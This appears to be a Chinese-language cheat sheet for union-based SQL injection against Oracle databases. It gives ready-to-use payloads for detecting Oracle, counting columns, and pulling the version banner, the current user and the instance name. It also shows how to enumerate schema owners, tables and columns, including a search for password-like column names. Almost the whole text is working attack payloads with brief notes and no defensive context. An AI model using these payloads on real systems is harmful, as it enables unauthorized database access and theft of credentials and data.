Oracle SQL 注入
1. 判断后端数据库是否为 Oracle
and exists (select * from dual) 或者 and (select count(*) from user_tables)>0 --
2. 获取基本信息
(1) 获取字段数
order by N
(2) 获取数据库版本
and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual
(3)获取当前数据库连接用户名
and 1=2 union select 1,2,(select sys_context('userenv','current_user') from dual),4 from dual
(4)获取日志文件的绝对路径(注:下面的语句查询的是 v$instance 中的 instance_name,即实例名,并非日志文件路径)
and 1=2 union select 1,2,(select instance_name from v$instance) from dual
3. 猜测数据库名/表和列名
(1)数据库名(这里取的是 all_tables 的 owner 列,即表所属的用户/schema)
and 1=2 union select (select owner from all_tables where rownum =1) from dual
(2)依次爆出数据库名
and 1=2 union select (select owner from all_tables where rownum =1 and owner<>'sys') from dual
(3)爆出表名
and 1=2 union select (select table_name from user_tables where rownum =1 ) from dual
and (select column_name from user_tab_columns where column_name like '%25pass%25')>0
and 1=2 union select (select column_name from user_tab_columns where column_name like '%25pass%25') from dual
(4)爆出字段名
and 1=2 union select (select column_name from user_tab_columns where table_name = 'bonus' and rownum =1 )from dual
(注意:表名要大写。Oracle 数据字典中未加引号的对象名默认以大写存储,字符串比较区分大小写)